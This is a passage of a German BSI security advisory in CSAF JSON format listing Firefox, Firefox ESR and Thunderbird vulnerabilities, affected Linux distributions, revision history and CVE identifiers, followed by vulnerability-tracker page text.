"summary": "Rocky Linux Security Advisory RLSA-2026:19201 vom 2026-05-20",
"url": "https://errata.build.resf.org/RLSA-2026:19201"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19348 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19348"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19464 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19464"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19468 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19468"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19542 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19542"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19469 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19469"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19463 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19463"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19655 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19655"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19704 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19704"
}
],
"source_lang": "en-US",
"title": "Mozilla Thunderbird, Firefox ESR und Firefox: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-05-20T22:00:00.000+00:00",
"generator": {
"date": "2026-05-21T07:57:26.231+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1228",
"initial_release_date": "2026-04-21T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-04-21T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-04-22T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Debian aufgenommen"
},
{
"date": "2026-04-23T22:00:00.000+00:00",
"number": "3",
"summary": "Anpassung CVSS Bewertung gem\u00e4\u00df NVD Angaben"
},
{
"date": "2026-04-26T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von openSUSE und Debian aufgenommen"
},
{
"date": "2026-04-27T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Oracle Linux, Red Hat und openSUSE aufgenommen"
},
{
"date": "2026-04-28T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Rocky Enterprise Software Foundation und SUSE aufgenommen"
},
{
"date": "2026-05-03T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Oracle Linux, Rocky Enterprise Software Foundation und Red Hat aufgenommen"
},
{
"date": "2026-05-04T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Red Hat und openSUSE aufgenommen"
},
{
"date": "2026-05-05T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2026-05-06T22:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2026-05-07T22:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von SUSE und Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2026-05-10T22:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-11T22:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2026-05-14T22:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von Red Hat und Rocky Enterprise Software Foundation, sowie PoC f\u00fcr CVE-2026-33626 aufgenommen"
},
{
"date": "2026-05-19T22:00:00.000+00:00",
"number": "15",
"summary": "Neue Updates von Red Hat und Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2026-05-20T22:00:00.000+00:00",
"number": "16",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "16"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux",
"product": {
"name": "Debian Linux",
"product_id": "2951",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:-"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c150",
"product": {
"name": "Mozilla Firefox \u003c150",
"product_id": "T053198"
}
},
{
"category": "product_version",
"name": "150",
"product": {
"name": "Mozilla Firefox 150",
"product_id": "T053198-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:firefox:150"
}
}
}
],
"category": "product_name",
"name": "Firefox"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c140.10",
"product": {
"name": "Mozilla Firefox ESR \u003c140.10",
"product_id": "T053196"
}
},
{
"category": "product_version",
"name": "140.1",
"product": {
"name": "Mozilla Firefox ESR 140.10",
"product_id": "T053196-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:firefox_esr:140.10"
}
}
},
{
"category": "product_version_range",
"name": "\u003c115.35",
"product": {
"name": "Mozilla Firefox ESR \u003c115.35",
"product_id": "T053197"
}
},
{
"category": "product_version",
"name": "115.35",
"product": {
"name": "Mozilla Firefox ESR 115.35",
"product_id": "T053197-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:firefox_esr:115.35"
}
}
}
],
"category": "product_name",
"name": "Firefox ESR"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c140.10",
"product": {
"name": "Mozilla Thunderbird \u003c140.10",
"product_id": "T053194"
}
},
{
"category": "product_version",
"name": "140.1",
"product": {
"name": "Mozilla Thunderbird 140.10",
"product_id": "T053194-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:thunderbird:140.10"
}
}
},
{
"category": "product_version_range",
"name": "\u003c150",
"product": {
"name": "Mozilla Thunderbird \u003c150",
"product_id": "T053195"
}
},
{
"category": "product_version",
"name": "150",
"product": {
"name": "Mozilla Thunderbird 150",
"product_id": "T053195-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:thunderbird:150"
}
}
}
],
"category": "product_name",
"name": "Thunderbird"
}
],
"category": "vendor",
"name": "Mozilla"
},
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RESF Rocky Linux",
"product": {
"name": "RESF Rocky Linux",
"product_id": "T032255",
"product_identification_helper": {
"cpe": "cpe:/o:resf:rocky_linux:-"
}
}
},
{
"category": "product_version",
"name": "9",
"product": {
"name": "RESF Rocky Linux 9",
"product_id": "T054059",
"product_identification_helper": {
"cpe": "cpe:/o:resf:rocky_linux:9"
}
}
}
],
"category": "product_name",
"name": "Rocky Linux"
}
],
"category": "vendor",
"name": "RESF"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version",
"name": "8.8",
"product": {
"name": "Red Hat Enterprise Linux 8.8",
"product_id": "T054056",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:8.8"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
},
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-2781",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-2781"
},
{
"cve": "CVE-2026-33626",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-33626"
},
{
"cve": "CVE-2026-6746",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6746"
},
{
"cve": "CVE-2026-6747",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6747"
},
{
"cve": "CVE-2026-6748",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6748"
},
{
"cve": "CVE-2026-6749",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6749"
},
{
"cve": "CVE-2026-6750",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6750"
},
{
"cve": "CVE-2026-6751",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6751"
},
{
"cve": "CVE-2026-6752",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6752"
},
{
"cve": "CVE-2026-6753",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6753"
},
{
"cve": "CVE-2026-6754",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6754"
},
{
"cve": "CVE-2026-6755",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6755"
},
{
"cve": "CVE-2026-6756",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6756"
},
{
"cve": "CVE-2026-6757",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6757"
},
{
"cve": "CVE-2026-6758",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6758"
},
{
"cve": "CVE-2026-6759",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6759"
},
{
"cve": "CVE-2026-6760",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6760"
},
{
"cve": "CVE-2026-6761",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6761"
},
{
"cve": "CVE-2026-6762",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6762"
},
{
"cve": "CVE-2026-6763",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6763"
},
{
"cve": "CVE-2026-6764",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6764"
},
{
"cve": "CVE-2026-6765",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6765"
},
{
"cve": "CVE-2026-6766",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6766"
},
{
"cve": "CVE-2026-6767",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6767"
},
{
"cve": "CVE-2026-6768",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6768"
},
{
"cve": "CVE-2026-6769",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6769"
},
{
"cve": "CVE-2026-6770",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6770"
},
{
"cve": "CVE-2026-6771",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6771"
},
{
"cve": "CVE-2026-6772",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6772"
},
{
"cve": "CVE-2026-6773",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6773"
},
{
"cve": "CVE-2026-6774",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6774"
},
{
"cve": "CVE-2026-6775",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6775"
},
{
"cve": "CVE-2026-6776",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6776"
},
{
"cve": "CVE-2026-6777",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6777"
},
{
"cve": "CVE-2026-6778",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6778"
},
{
"cve": "CVE-2026-6779",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6779"
},
{
"cve": "CVE-2026-6780",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6780"
},
{
"cve": "CVE-2026-6781",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6781"
},
{
"cve": "CVE-2026-6782",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6782"
},
{
"cve": "CVE-2026-6783",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6783"
},
{
"cve": "CVE-2026-6784",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6784"
},
{
"cve": "CVE-2026-6785",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6785"
},
{
"cve": "CVE-2026-6786",
"product_status": {
"known_affected": [
"T053198",
"T054056",
"T053196",
"T053197",
"T053194",
"67646",
"T053195",
"T004914",
"T032255",
"T054059",
"2951",
"T002207",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6786"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…